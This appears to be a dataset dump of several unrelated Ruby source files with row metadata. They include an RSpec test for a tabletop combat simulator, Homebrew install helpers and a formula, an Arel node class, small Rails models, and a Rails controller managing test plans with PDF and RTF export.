| 51.695876 | 161 | 0.753814 |
f822d38ce353d6880298f5e11734663dbc35f628 | 14,018 | # typed: false
RSpec.describe AttackAction do
let(:session) { Natural20::Session.new }
context do
before do
srand(1000)
@battle_map = Natural20::BattleMap.new(session, 'fixtures/battle_sim')
@battle = Natural20::Battle.new(session, @battle_map)
@character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'))
@npc = session.npc(:ogre)
@npc2 = session.npc(:goblin)
end
context 'attack test' do
before do
String.disable_colorization true
@battle.add(@character, :a, position: :spawn_point_1, token: 'G')
@battle.add(@npc, :b, position: :spawn_point_2, token: 'g')
@character.reset_turn!(@battle)
@npc.reset_turn!(@battle)
end
it 'auto build' do
cont = AttackAction.build(session, @character)
loop do
param = cont.param&.map do |p|
case (p[:type])
when :select_target
@npc
when :select_weapon
'vicious_rapier'
else
raise "unknown #{p.type}"
end
end
cont = cont.next.call(*param)
break if param.nil?
end
expect(cont.target).to eq(@npc)
expect(cont.source).to eq(@character)
expect(cont.using).to eq('vicious_rapier')
end
context 'two weapon fighting' do
before do
@character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'elf_rogue.yml'),
{ equipped: %w[dagger dagger] })
@npc = session.npc(:goblin)
@battle.add(@character, :a, token: 'R', position: [0, 0])
@battle.add(@npc, :b, token: 'g', position: [1, 0])
@character.reset_turn!(@battle)
@npc.reset_turn!(@battle)
end
it 'allows for two weapon fighting' do
puts Natural20::MapRenderer.new(@battle_map).render
expect(@character.available_actions(session, @battle).map(&:action_type)).to include(:attack)
expect(@character.equipped_items.map(&:label)).to eq(%w[Dagger Dagger])
action = AttackAction.build(session, @character).next.call(@npc).next.call('dagger').next.call
@battle.action!(action)
@battle.commit(action)
expect(@character.available_actions(session, @battle).map(&:action_type)).to include(:attack)
end
end
specify 'unarmed attack' do
Natural20::EventManager.standard_cli
@battle_map.move_to!(@character, 0, 5, @battle)
srand(1000)
puts Natural20::MapRenderer.new(@battle_map).render
action = AttackAction.build(session, @character).next.call(@npc).next.call('unarmed_attack').next.call
expect do
@battle.action!(action)
@battle.commit(action)
end.to change(@npc, :hp).from(59).to(57)
end
context 'versatile weapon' do
it 'one handed attack' do
@character.unequip(:longbow)
expect(@character.equipped_items.map(&:name).sort).to eq(%i[shield studded_leather vicious_rapier])
action = AttackAction.build(session, @character).next.call(@npc).next.call('spear').next.call
action.resolve(session, @battle_map, battle: @battle)
expect(action.result.first[:damage_roll]).to eq('1d6+3')
@character.unequip(:vicious_rapier)
action.resolve(session, @battle_map, battle: @battle)
expect(action.result.first[:damage_roll]).to eq('1d8+3')
end
end
specify 'range disadvantage' do
@battle.add(@npc2, :b, position: [3, 3], token: 'O')
@npc2.reset_turn!(@battle)
Natural20::EventManager.standard_cli
action = AttackAction.build(session, @character).next.call(@npc).next.call('longbow').next.call
expect do
@battle.action!(action)
@battle.commit(action)
end.to change(@npc, :hp).from(59).to(52)
end
end
context 'resistances and vulnerabilities' do
before do
Natural20::EventManager.standard_cli
@npc = session.npc(:skeleton, overrides: { max_hp: 100 })
@battle.add(@npc, :b, position: [1, 0])
@battle.add(@character, :a, position: [2, 0])
end
context 'handle resistances and vulnerabilites' do
specify 'attack with normal weapon' do
srand(1000)
expect do
puts Natural20::MapRenderer.new(@battle_map, @battle).render
@action = AttackAction.build(session, @character).next.call(@npc).next.call('dagger').next.call
@action.resolve(session, @battle_map, battle: @battle)
@battle.commit(@action)
end.to change(@npc, :hp).from(100).to(87)
end
specify 'attack with vulnerable weapon' do
srand(1000)
expect do
puts Natural20::MapRenderer.new(@battle_map, @battle).render
@action = AttackAction.build(session, @character).next.call(@npc).next.call('light_hammer').next.call
@action.resolve(session, @battle_map, battle: @battle)
@battle.commit(@action)
end.to change(@npc, :hp).from(100).to(82)
end
end
end
context 'unseen attacker' do
before do
@battle.add(@character, :a, position: :spawn_point_3, token: 'G')
@character.reset_turn!(@battle)
@guard = @battle_map.entity_at(5, 5)
@action = AttackAction.build(session, @character).next.call(@guard).next.call('longbow').next.call
srand(2000)
end
context 'attack from the dark' do
specify '#compute_advantages_and_disadvantages' do
puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
weapon = session.load_weapon('longbow')
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[:unseen_attacker], []])
end
it 'computes advantage' do
Natural20::EventManager.standard_cli
expect do
@battle.action!(@action)
@battle.commit(@action)
end.to change { @guard.hp }.from(10).to(0)
end
end
context 'when target is prone' do
before do
@battle_map.move_to!(@character, 2, 3, @battle)
@guard.prone!
end
context 'ranged weapon' do
let(:weapon) { session.load_weapon('longbow') }
specify 'has range disadvantage' do
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[], [:target_is_prone_range]])
end
end
context 'melee attack' do
let(:weapon) { session.load_weapon('rapier') }
specify 'has melee advantage' do
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[:target_is_prone], []])
end
end
end
context 'when attacker is prone' do
before do
@battle_map.move_to!(@character, 2, 3, @battle)
@character.prone!
end
context 'ranged weapon' do
let(:weapon) { session.load_weapon('longbow') }
specify 'has range disadvantage' do
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[], [:prone]])
end
end
context 'melee attack' do
let(:weapon) { session.load_weapon('rapier') }
specify 'has melee disadvantage' do
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[], [:prone]])
end
end
end
context 'attack while hiding' do
let(:weapon) { session.load_weapon('longbow') }
before do
@battle_map.move_to!(@character, 2, 3, @battle)
@character.hiding!(@battle, 20)
end
specify '#compute_advantages_and_disadvantages' do
puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[:unseen_attacker], []])
end
context 'bad at hiding' do
before do
@character.hiding!(@battle, 8)
end
specify '#compute_advantages_and_disadvantages' do
puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
weapon)).to eq([[], []])
end
end
context 'Naturally Stealthy' do
before do
@character2 = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'halfling_rogue.yml'))
@battle.add(@character2, :a, position: [1, 3])
@battle_map.move_to!(@guard, 4, 3, @battle)
@character2.hiding!(@battle, 20)
end
specify do
expect(@character2.class_feature?('naturally_stealthy')).to be
end
specify '#compute_advantages_and_disadvantages' do
puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
expect(@action.compute_advantages_and_disadvantages(@battle, @character2, @guard,
weapon)).to eq([[:unseen_attacker], []])
end
end
end
context 'pack_tactics' do
before do
@npc = session.npc(:wolf)
@npc2 = session.npc(:wolf)
@battle_map.move_to!(@character, 0, 5, @battle)
@battle.add(@npc, :b, position: [1, 5])
@battle.add(@npc2, :b, position: [0, 6])
end
specify '#compute_advantages_and_disadvantages' do
puts Natural20::MapRenderer.new(@battle_map).render
expect(@action.compute_advantages_and_disadvantages(@battle, @npc, @character,
@npc.npc_actions.first)).to eq([[:pack_tactics], []])
end
specify 'no pack tactics if no ally' do
@battle_map.move_to!(@npc2, 2, 5, @battle)
puts Natural20::MapRenderer.new(@battle_map).render
expect(@action.compute_advantages_and_disadvantages(@battle, @npc, @character,
@npc.npc_actions.first)).to eq([[], []])
end
end
end
context 'attacking an unseen or invisible target' do
before do
Natural20::EventManager.standard_cli
@character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'human_fighter.yml'))
@goblin = session.npc(:goblin)
@battle.add(@character, :a, position: [5, 0])
@battle_map.place(5, 1, @goblin)
@action = AttackAction.build(session, @character).next.call(@goblin).next.call('dagger').next.call
end
specify 'has disadvantage' do
puts Natural20::MapRenderer.new(@battle_map).render
expect(@action.compute_advantages_and_disadvantages(@battle, @character, @goblin,
'dagger')).to eq([[], [:invisible_attacker]])
end
specify 'can attack invisible' do
@battle.action!(@action)
@battle.commit(@action)
expect(@action.result.last[:attack_roll].roller.disadvantage).to be
end
end
context 'protection fighting style' do
before do
@npc = session.npc(:wolf)
@character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'),
{ class_features: ['protection'] })
@character2 = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'halfling_rogue.yml'))
@battle.add(@character, :a, position: [0, 5])
@battle.add(@character2, :a, position: [1, 5])
@battle.add(@npc, :b, position: [1, 6])
@character.reset_turn!(@battle)
Natural20::EventManager.standard_cli
end
specify 'able to impose disadvantage on attack roll' do
puts Natural20::MapRenderer.new(@battle_map).render
expect(@character.class_feature?('protection')).to be
expect(@character.shield_equipped?).to be
action = AttackAction.build(session, @npc).next.call(@character2).next.call('Bite').next.call
@battle.action!(action)
@battle.commit(action)
expect(action.advantage_mod).to eq(-1)
expect(@character.total_reactions(@battle)).to eq(0)
end
end
end
context '#calculate_cover_ac' do
before do
@battle_map = Natural20::BattleMap.new(session, 'fixtures/battle_sim_objects')
@map_renderer = Natural20::MapRenderer.new(@battle_map)
@character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'))
@npc2 = session.npc(:goblin)
@battle_map.place(1, 2, @character, 'G')
@battle_map.place(5, 2, @npc2, 'g')
@action = AttackAction.build(session, @character).next.call(@npc2).next.call('longbow').next.call
@action2 = AttackAction.build(session, @npc2).next.call(@character).next.call('longbow').next.call
end
it 'adjusts AC based on cover characteristics' do
expect(@action.calculate_cover_ac(@battle_map, @npc2)).to eq 0
expect(@action2.calculate_cover_ac(@battle_map, @character)).to eq 2
end
end
end
| 40.514451 | 115 | 0.582323 |
d583d72b5f4df4bb305aecb820eda03af8f786db | 3,024 | require "diagnostic"
require "fileutils"
require "hardware"
require "development_tools"
module Homebrew
module Install
module_function
def check_ppc
case Hardware::CPU.type
when :ppc
abort <<~EOS
Sorry, Homebrew does not support your computer's CPU architecture.
For PPC support, see: https://github.com/mistydemeo/tigerbrew
EOS
end
end
def check_writable_install_location
if HOMEBREW_CELLAR.exist? && !HOMEBREW_CELLAR.writable_real?
raise "Cannot write to #{HOMEBREW_CELLAR}"
end
prefix_writable = HOMEBREW_PREFIX.writable_real? || HOMEBREW_PREFIX.to_s == "/usr/local"
raise "Cannot write to #{HOMEBREW_PREFIX}" unless prefix_writable
end
def check_development_tools
return unless OS.mac?
checks = Diagnostic::Checks.new
checks.fatal_development_tools_checks.each do |check|
out = checks.send(check)
next if out.nil?
ofail out
end
exit 1 if Homebrew.failed?
end
def check_cellar
FileUtils.mkdir_p HOMEBREW_CELLAR unless File.exist? HOMEBREW_CELLAR
rescue
raise <<~EOS
Could not create #{HOMEBREW_CELLAR}
Check you have permission to write to #{HOMEBREW_CELLAR.parent}
EOS
end
# Symlink the dynamic linker, ld.so
def symlink_ld_so
ld_so = HOMEBREW_PREFIX/"lib/ld.so"
return if ld_so.readable?
sys_interpreter = [
"/lib64/ld-linux-x86-64.so.2",
"/lib/ld-linux.so.3",
"/lib/ld-linux.so.2",
"/lib/ld-linux-armhf.so.3",
"/lib/ld-linux-aarch64.so.1",
"/system/bin/linker",
].find do |s|
Pathname.new(s).executable?
end
raise "Unable to locate the system's ld.so" unless sys_interpreter
interpreter = begin
glibc = Formula["glibc"]
glibc.installed? ? glibc.lib/"ld-linux-x86-64.so.2" : sys_interpreter
rescue FormulaUnavailableError
sys_interpreter
end
FileUtils.mkdir_p HOMEBREW_PREFIX/"lib"
FileUtils.ln_sf interpreter, ld_so
end
# Symlink the host's compiler
def symlink_host_gcc
version = DevelopmentTools.non_apple_gcc_version "/usr/bin/gcc"
return if version.null?
suffix = (version < 5) ? version.to_s[/^\d+\.\d+/] : version.to_s[/^\d+/]
return if File.executable?("/usr/bin/gcc-#{suffix}") || File.executable?(HOMEBREW_PREFIX/"bin/gcc-#{suffix}")
FileUtils.mkdir_p HOMEBREW_PREFIX/"bin"
["gcc", "g++", "gfortran"].each do |tool|
source = "/usr/bin/#{tool}"
dest = HOMEBREW_PREFIX/"bin/#{tool}-#{suffix}"
next if !File.executable?(source) || File.executable?(dest)
FileUtils.ln_sf source, dest
end
end
def perform_preinstall_checks
check_ppc
check_writable_install_location
check_development_tools if DevelopmentTools.installed?
check_cellar
return if OS.mac?
symlink_ld_so
symlink_host_gcc
end
end
end
| 30.545455 | 115 | 0.647156 |
acb2e67728e363515178d4fb43b198db9a25721a | 1,396 | # frozen_string_literal: true
module Arel # :nodoc: all
module Nodes
class HomogeneousIn < Node
attr_reader :attribute, :values, :type
def initialize(values, attribute, type)
@values = values
@attribute = attribute
@type = type
end
def hash
ivars.hash
end
def eql?(other)
super || (self.class == other.class && self.ivars == other.ivars)
end
alias :== :eql?
def equality?
true
end
def invert
Arel::Nodes::HomogeneousIn.new(values, attribute, type == :in ? :notin : :in)
end
def left
attribute
end
def right
attribute.quoted_array(values)
end
def table_name
attribute.relation.table_alias || attribute.relation.name
end
def column_name
attribute.name
end
def casted_values
type = attribute.type_caster
casted_values = values.map do |raw_value|
type.serialize(raw_value) if type.serializable?(raw_value)
end
casted_values.compact!
casted_values
end
def fetch_attribute(&block)
if attribute
yield attribute
else
expr.fetch_attribute(&block)
end
end
protected
def ivars
[@attribute, @values, @type]
end
end
end
end
| 19.123288 | 85 | 0.565186 |
919bdc7923f0cccb67fbb7b3f587b11a15b5b7c8 | 206 | class User < ApplicationRecord
validates :email, :username, uniqueness: true, presence: true
validates :username, length: { in: 4..15 }
validates :password, presence: true, length: { minimum: 6 }
end
| 34.333333 | 63 | 0.718447 |
018770f86e0bf24b87df31d8c758ac7b956fd759 | 592 | module Hanuman
class Setting < ActiveRecord::Base
has_paper_trail
validates_uniqueness_of :key
def self.sort(sort_column, sort_direction)
order((sort_column + " " + sort_direction).gsub("asc asc", "asc").gsub("asc desc", "asc"))
end
def self.enable?(key)
k = find_by_key(key)
if k.blank?
false
else
k.value == 'true' ? true : false
end
end
def self.value(key)
k = find_by_key(key)
if k.blank?
"Setting not found for key: '" + key + "'!"
else
k.value
end
end
end
end
| 19.733333 | 96 | 0.565878 |
184508cb76de68d43cd39f06e0d00ea2b87333d4 | 20,505 | class TestPlansController < ApplicationController
# GET /test_plans
# GET /test_plans.xml
def index
# The index function is now a bit more complicated.
# The initial page lists all available products
# Opening the products should show a lis of test plans for the product
authorize! :read, TestPlan
# New test case is used by ability in view
# see bug... https://github.com/ryanb/cancan/issues/523
@test_plan = TestPlan.new
@products = current_user.products.order('name')
respond_to do |format|
format.html # index.html.erb
end
end
# GET /test_plans/1
# GET /test_plans/1.xml
def show
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :read, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Find the parent test case ID
parent_id = view_context.find_test_plan_parent_id(@test_plan)
# Find the list of related test case versions
@test_plans = TestPlan.where( "id = ? OR parent_id = ?", parent_id, parent_id ).where("id <> ?", @test_plan.id)
respond_to do |format|
format.html # show.html.erb
format.pdf do
pdf = PlanPdf.new(@test_plan, view_context)
send_data pdf.render, :filename => "plan_#{@test_plan.id}.pdf",
:type => "application/pdf",
:disposition => "inline"
end
format.rtf do
send_data generate_rtf(@test_plan), :filename => "plan_#{@test_plan.id}.rtf",
:type => "text/richtext",
:disposition => "inline"
end
end
end
# GET /test_plans/new
# GET /test_plans/new.xml
def new
@test_plan = TestPlan.new
# @test_cases = TestCase.all
@products = current_user.products.order('name')
authorize! :create, @test_plan
# Make a list of all applicable custom fields and add to the test case item
custom_fields = CustomField.where(:item_type => 'test_plan', :active => true)
custom_fields.each do |custom_field|
@test_plan.custom_items.build(:custom_field_id => custom_field.id)
end
respond_to do |format|
format.html # new.html.erb
end
end
# GET /test_plans/1/edit
def edit
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# If editing after assignment allowed or it is not assigned, start edit
if (Setting.value('Allow Test Plan Edit After Assignment') == true) or (Assignment.where(:test_plan_id => @test_plan.id).count < 1)
# @test_cases = TestCase.all
@products = current_user.products.order('name')
@plan_id = @test_plan.id
authorize! :update, @test_plan
# We need to make sure that all custom fields exist on this item. If not, we add them.
# Find all applicable custom fields
custom_fields = CustomField.where(:item_type => 'test_plan', :active => true)
custom_fields.each do |custom_field|
# If an entry for the current field doesn't exist, add it.
if @test_plan.custom_items.where(:custom_field_id => custom_field.id).first == nil
@test_plan.custom_items.build(:custom_field_id => custom_field.id)
end
end
#otherwise redirect to view page with warning
else
redirect_to @test_plan, :flash => {:warning => 'This test plan can not be edited. The plan has been assigned and editing assigned plans is disabled in the settings.'}
end
end
# POST /test_plans
# POST /test_plans.xml
def create
@test_plan = TestPlan.new(permitted_params[:test_plan])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :create, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Set the created and modified by fields
@test_plan.created_by = current_user
@test_plan.modified_by = current_user
respond_to do |format|
if @test_plan.save
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 1, :user_id => current_user.id)
# Redirect based on button. IF they clicked SAve and Add Test cases, go to edit view
# Otherwise, load show page
if permitted_params[:commit] == "Save and Add Test Cases"
format.html { redirect_to(edit_test_plan_path(@test_plan), :notice => 'Test plan was successfully created. Please add cases.') }
else
format.html { redirect_to(@test_plan, :notice => 'Test plan was successfully created.') }
end
# If there was an error, return to the new page
else
@products = Product.all.order(:name)
format.html { render :action => "new" }
end
end
end
# PUT /test_plans/1
# PUT /test_plans/1.xml
def update
@test_plan = TestPlan.find(permitted_params[:id])
@comment = Comment.new(:test_plan_id => @test_plan.id, :comment => 'Enter a new comment')
authorize! :update, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
# Verify that if they change the product, it is changed to a product they have access to.
authorize_product!(Product.find(permitted_params[:test_plan][:product_id]))
# Set the created and modified by fields
@test_plan.modified_by = current_user
# The list of of test case IDs are provided in order
# Form is c=A&c=B&c=C...
# We strip the first two chars then split values.
# For each test case, we update the order number on Plan release
# We only do the update if there were changes. There are no changes
# when only removes or no changes made
if permitted_params['selectedCaseOrder'] != ""
orderNum = 1
permitted_params['selectedCaseOrder'][2..-1].split('&c=').each do |id|
plan_case = PlanCase.where(:test_case_id => id, :test_plan_id => @test_plan.id).first
plan_case.case_order = orderNum
plan_case.save
orderNum += 1
end
end
respond_to do |format|
if @test_plan.update_attributes(permitted_params[:test_plan])
#if @test_plan.save
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 2, :user_id => current_user.id)
format.html { redirect_to(@test_plan, :notice => 'Test plan was successfully updated.') }
else
@products = Product.all.order(:name)
@plan_id = @test_plan.id
format.html { render :action => "edit" }
end
end
end
# DELETE /test_plans/1
# DELETE /test_plans/1.xml
def destroy
@test_plan = TestPlan.find(permitted_params[:id])
authorize! :destroy, @test_plan
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_plan.product)
if ( Assignment.where(:test_plan_id => @test_plan.id).count > 0 )
redirect_to test_plans_url, :flash => {:warning => 'Can not delete. Test plan has already been assigned for testing.' }
else
@test_plan.destroy
# Create item in log history
# Action type based on value from en.yaml
History.create(:test_plan_id => @test_plan.id, :action => 3, :user_id => current_user.id)
respond_to do |format|
format.html { redirect_to(test_plans_path, :notice => 'Test plan was successfully deleted.') }
end
end
end
# GET /test_plans/copy/1
def copy
# begin
original_test_plan = TestPlan.find( permitted_params[:id] )
# Verify user can view this test case. Must be in his product
authorize_product!(original_test_plan.product)
@test_plan = original_test_plan.duplicate_plan
redirect_to edit_test_plan_path(@test_plan), :notice => "Test plan copied successfully"
# rescue
# redirect_to test_plans_path, :flash => {:warning => 'There was an error copying the test plan.'}
# end
end
# GET /test_plans/search/
def search
authorize! :read, TestPlan
# This is used for the simple search function.
# Note that this currently utlizes the search module that is contained within the model.
if permitted_params[:search]
# find(:all, :conditions => ['name LIKE ?', "%#{search}%"])
@test_plans = TestPlan.where(:product_id => current_user.products).where('name LIKE ?', "%#{params[:search]}%")
else
@test_plans = TestPlan.where(:product_id => current_user.products)
end
end
# get /test_plans/create_new_version/:id
def create_new_version
begin
original_test_plan = TestPlan.find( permitted_params[:id] )
# Verify user can view this test plan. Must be in his product
authorize_product!(original_test_plan.product)
# Find the parent test case ID
parent_id = view_context.find_test_plan_parent_id(original_test_plan)
# Find the current max version for this parent id
max_version = TestPlan.where( "id = ? OR parent_id = ?", parent_id, parent_id ).maximum(:version)
# clone the test case
@test_plan = original_test_plan.dup
# Remember to increate the version value
@test_plan.version = max_version + 1
@test_plan.parent_id = parent_id
if @test_plan.save
# Make a clone of each step for this test case
original_test_plan.plan_cases.each do |plan_case|
new_plan_case = plan_case.dup
new_plan_case.test_plan_id = @test_plan.id
new_plan_case.save
end
# Mark the earlier test case as deprecated
original_test_plan.deprecated = true
original_test_plan.save
redirect_to @test_plan, :notice => "Test plan versioned successfully"
else
redirect_to test_plans_path, :flash => {:warning => 'There was an error generating the new version.'}
end
rescue
redirect_to test_plans_path, :flash => {:warning => 'There was an error generating the new version.'}
end
end
# GET /test_plans/:plan_id/add_case/:id
# Call on test plan form to add a case to the selected case module
# Done this way to calculate product name, category path
def add_test_case
# Find the case then load the JS
@test_case = TestCase.find(permitted_params[:id])
# Verify user can view this test plan. Must be in his product
authorize_product!(@test_case.product)
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Add the test case to the test plan
test_plan = TestPlan.find(@plan_id)
test_plan.test_cases << @test_case
respond_to do |format|
format.js
end
end
# GET /test_plans/:plan_id/remove_case/:id
# Call on test plan form to remove case from the selected case module
# Done this way to calculate product name, category path
# And actually remove item
def remove_test_case
# Find the case then load the JS
@test_case = TestCase.find(permitted_params[:id])
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Remove the test case from the test plan
test_plan = TestPlan.find(@plan_id)
test_plan.test_cases.delete @test_case
respond_to do |format|
format.js
end
end
# GET /test_plans/list/:product_id
def list
# This function takes a product ID and returns a list of test plans
# JS is returned.
# This new item is simple used to test if the user can create test plans
# There is a bug in cancan that prevents ?can TestPlan from working
# https://github.com/ryanb/cancan/issues/523
@test_plan = TestPlan.new
# Product ID is required for the JS
@product_id = permitted_params[:product_id]
# Verify user can view this test plan. Must be in his product
authorize_product!(Product.find(@product_id))
# Generate a list of the test plans for the product
@test_plans = TestPlan.where(:product_id => @product_id)
# First we insert the underline
#@newDivs= "<div class='rectangle' style='display: block'></div>"
#if testplans.empty?
# @newDivs += '<div class=\"treeNoData\">Product does not have any test plans</div>'
#else
# @newDivs += '<div class=\"treeNode\"><table class=\"treeTable\"'
# @newDivs += '<tr><th>Name</th><th>Description</th><th></th><th></th><th></th></tr>'
# testplans.each do |testplan|
# testPlanLink = '<a href=\"' + test_plan_path(testplan) + '\">' + testplan.name + '</a>'
# editLink = '<a href=\"' + edit_test_plan_path(testplan) + '\">Edit</a>'
# @newDivs += '<tr><td>' + testPlanLink + '</td><td>' + testplan.description + '</td><td>' + editLink + '</td></tr>'
# end
# @newDivs += '</table></div>'
#end
respond_to do |format|
format.js
end
end
# GET /test_plans/list/:product_id
def list_categories
# This function takes a product ID and returns a list of categories
# JS returned.
@categories = Category.where(product_id: permitted_params[:product_id]).order(:name)
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# It seems unneccessary to get the product as it is related to the categories
# however, if there are no categories, we still need to know which product we're deling with
# so we retrieve the product for the display
@product = Product.find(permitted_params[:product_id])
# Verify user can view this test plan. Must be in his product
authorize_product!(@product)
respond_to do |format|
format.js
end
end
# GET /test_plans/list_children/:category_id
def list_category_children
# This function takes a category ID and returns a list of sub-categories and test cases
# JS is returned.
# Pass @category_id to the js view so it knows which div to add code to
@category_id = permitted_params[:category_id]
# We need to pass this on. Plan ID is required for figuring out if a case is already included
# in a test plan
@plan_id = permitted_params[:plan_id]
# Find all of the sub categories for this sub-category
@categories = Category.find(@category_id).categories
# Find all of the test cases for this category
@testcases = TestCase.where(:category_id => @category_id)
# Verify user can view this test case. Must be in his product
authorize_product!(Category.find(@category_id).generate_product)
respond_to do |format|
format.js
end
end
private
def generate_rtf(test_plan)
colours = [RTF::Colour.new(0, 0, 0),
RTF::Colour.new(255, 255, 255),
RTF::Colour.new(100, 100, 100)]
# Create the used styles.
styles = {}
styles['CS_TITLE'] = RTF::CharacterStyle.new
styles['CS_TITLE'].bold = true
styles['CS_TITLE'].font_size = 36
styles['CS_BOLD'] = RTF::CharacterStyle.new
styles['CS_BOLD'].bold = true
styles['CS_HEADER'] = RTF::CharacterStyle.new
styles['CS_HEADER'].bold = true
styles['CS_HEADER'].font_size = 28
styles['CS_TABLE_HEADER'] = RTF::CharacterStyle.new
styles['CS_TABLE_HEADER'].foreground = colours[1]
styles['PS_NORMAL'] = RTF::ParagraphStyle.new
styles['PS_NORMAL'].space_after = 300
styles['PS_TITLE'] = RTF::ParagraphStyle.new
styles['PS_TITLE'].space_before = 6000
styles['PS_TITLE'].space_after = 300
styles['PS_HEADER'] = RTF::ParagraphStyle.new
styles['PS_HEADER'].space_before = 100
styles['PS_HEADER'].space_after = 300
# Create the document
document = RTF::Document.new(RTF::Font.new(RTF::Font::ROMAN, 'Arial'))
# Create the title page
document.paragraph(styles['PS_TITLE']) do |p1|
p1.apply(styles['CS_TITLE']) << 'Test Plan: ' + test_plan.name
end
document.page_break()
# Create the test case list page
document.paragraph(styles['PS_HEADER']) do |p1|
p1.apply(styles['CS_HEADER']) << 'Test Plan Details'
end
# List test cases page
document.paragraph(styles['NORMAL']) do |p|
p.apply(styles['CS_BOLD']) << 'Title: '
p << test_plan.name
p.line_break
p.apply(styles['CS_BOLD']) << 'Description: '
p << test_plan.description
p.line_break
p.apply(styles['CS_BOLD']) << 'Version: '
p << test_plan.version.to_s
p.line_break
p.apply(styles['CS_BOLD']) << 'Product: '
p << test_plan.product.name
p.line_break
end
# Test Case Header
document.paragraph(styles['PS_HEADER']) do |p1|
p1.apply(styles['CS_HEADER']) << 'Test Cases'
end
# Create table of test cases
table = document.table(test_plan.test_cases.count + 1, 5, 1750, 1750, 1750, 1050, 3000 )
table.border_width = 5
table[0][0].shading_colour = colours[2]
table[0][0].apply(styles['CS_TABLE_HEADER']) << 'Name'
table[0][1].shading_colour = colours[2]
table[0][1].apply(styles['CS_TABLE_HEADER']) << 'Product'
table[0][2].shading_colour = colours[2]
table[0][2].apply(styles['CS_TABLE_HEADER']) << 'Category'
table[0][3].shading_colour = colours[2]
table[0][3].apply(styles['CS_TABLE_HEADER']) << 'Version'
table[0][4].shading_colour = colours[2]
table[0][4].apply(styles['CS_TABLE_HEADER']) << 'Description'
i = 1
test_plan.test_cases.order("case_order").each do | test_case|
table[i][0] << test_case.name
table[i][1] << test_case.product.name
table[i][2] << test_case.category.name
table[i][3] << test_case.version.to_s
table[i][4] << test_case.description
i = i + 1
end
document.line_break
# END OF TEST CASE TABLE
test_plan.test_cases.order("case_order").each do | test_case|
# IMportant. The page break start the test case.
# this is because, RTF fails to render properly if the last item in the document is a page break
# If it is at the end, there is a page break after the last comment.
document.page_break
document.paragraph(styles['NORMAL']) do |p|
p.apply(styles['CS_HEADER']) << 'Test Case: ' + test_case.name
p.line_break
p.apply(styles['CS_BOLD']) << 'Description: '
p << test_case.description
p.line_break
p.apply(styles['CS_BOLD']) << 'Version: '
p << test_case.version.to_s
p.line_break
p.apply(styles['CS_BOLD']) << 'Product: '
p << test_case.product.name
p.line_break
p.line_break
if test_case.steps.count == 0
p << 'There are no recorded steps for this test case.'
end
end
if test_case.steps.count > 0
table1 = document.table(test_case.steps.count + 1, 3, 600, 4000, 4000 )
table1.border_width = 5
table1[0][0].shading_colour = colours[2]
table1[0][0].apply(styles['CS_TABLE_HEADER']) << 'Step'
table1[0][1].shading_colour = colours[2]
table1[0][1].apply(styles['CS_TABLE_HEADER']) << 'Action'
table1[0][2].shading_colour = colours[2]
table1[0][2].apply(styles['CS_TABLE_HEADER']) << 'Expected Result'
i = 1
test_case.steps.each do |step|
table1[i][0] << i.to_s
table1[i][1] << step.action
if step.result == nil
table1[i][2] << ' '
else
table1[i][2] << step.result
end
i = i + 1
end
table1.to_rtf
end
end
document.to_rtf
end
end | 37.281818 | 172 | 0.640527 |
26f5666dc83ef64af4394f88029dbc0b46dc7c94 | 820 | class RexsterConsole < Formula
homepage "https://github.com/tinkerpop/rexster/wiki"
url "http://tinkerpop.com/downloads/rexster/rexster-console-2.6.0.zip"
sha256 "5f3af7bfc95847e8efa28610b23e2c175c6d92c14e5f3a468b9476cb1f2dfe1e"
bottle do
cellar :any
sha256 "affe578e75691159a7a850c8b144eaaabc58d8375d7172852069b951ddc88239" => :yosemite
sha256 "17254b31620dc42f4ee9c49a7bba38a1506312939dcf8d2a54a16f1a6cafd2e6" => :mavericks
sha256 "a9dd91d430d35af266e9298d3bae82445f6cbf0521cb615f5cbc854974b89308" => :mountain_lion
end
def install
libexec.install %w[lib doc]
(libexec/"ext").mkpath
(libexec/"bin").install "bin/rexster-console.sh" => "rexster-console"
bin.install_symlink libexec/"bin/rexster-console"
end
test do
system "#{bin}/rexster-console", "-h"
end
end
| 34.166667 | 95 | 0.769512 |
